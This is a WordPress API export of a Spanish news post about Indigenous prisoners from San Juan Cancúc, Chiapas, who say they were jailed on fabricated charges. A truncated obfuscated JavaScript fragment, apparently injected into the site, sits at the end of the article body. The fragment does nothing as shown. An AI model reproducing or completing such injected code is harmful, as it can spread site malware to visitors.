{"id":22233,"date":"2025-06-03T05:06:06","date_gmt":"2025-06-03T05:06:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22233"},"modified":"2025-06-03T05:06:06","modified_gmt":"2025-06-03T05:06:06","slug":"presos-de-cancuc-cumplen-tres-anos-de-reclusion-denuncian-delito-fabricado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22233","title":{"rendered":"Presos de Canc\u00fac cumplen tres a\u00f1os de reclusi\u00f3n: denuncian delito fabricado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000149227-1024x682.jpg\" alt=\"\" class=\"wp-image-22234\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000149227-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000149227-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000149227-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000149227-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000149227-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000149227.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodriguez\/ corresponsal<br>San Crist\u00f3bal de Las Casas.- Los presos originarios del municipio de San Juan Canc\u00fac, cumplieron tres a\u00f1os de encierro, denunciando haber sido v\u00edctimas de una acusaci\u00f3n fabricada. La detenci\u00f3n ocurri\u00f3 en 2022, cuando elementos de la Guardia Nacional, el Ej\u00e9rcito Mexicano y la polic\u00eda municipal los arrestaron en circunstancias que, aseguran, estuvieron marcadas por irregularidades.<\/p>\n\n\n\n<p>Desde el interior de la c\u00e1rcel, los presos expresaron su gratitud a las personas, comunidades y organizaciones que han acompa\u00f1ado su proceso durante estos tres a\u00f1os, tanto con su solidaridad como con las visitas carcelarias.<\/p>\n\n\n\n<p>&#8220;Les agradecemos mucho a los que nos han apoyado adentro de la c\u00e1rcel. Les animamos, compas y compa\u00f1eras, seguimos la lucha&#8221;, expresaron en un mensaje dirigido especialmente a los pueblos creyentes, a la di\u00f3cesis de San Crist\u00f3bal y a las parroquias que se han mantenido cerca de su causa.<\/p>\n\n\n\n<p>El caso de los presos de San Juan Canc\u00fac ha sido visibilizado por colectivos y organismos de derechos humanos que exigen su liberaci\u00f3n, denunciando una criminalizaci\u00f3n sistem\u00e1tica hacia los pueblos ind\u00edgenas en Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodriguez\/ corresponsalSan Crist\u00f3bal de Las Casas.- Los presos originarios del municipio de San Juan Canc\u00fac, cumplieron tres a\u00f1os de encierro, denunciando haber sido v\u00edctimas de una acusaci\u00f3n fabricada. La detenci\u00f3n ocurri\u00f3 en 2022, cuando elementos de la Guardia Nacional, el Ej\u00e9rcito Mexicano y la polic\u00eda municipal los arrestaron en circunstancias que, aseguran, estuvieron marcadas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22234,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22233","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22233","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22233"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22233\/revisions"}],"predecessor-version":[{"id":22235,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22233\/revisions\/22235"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22234"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}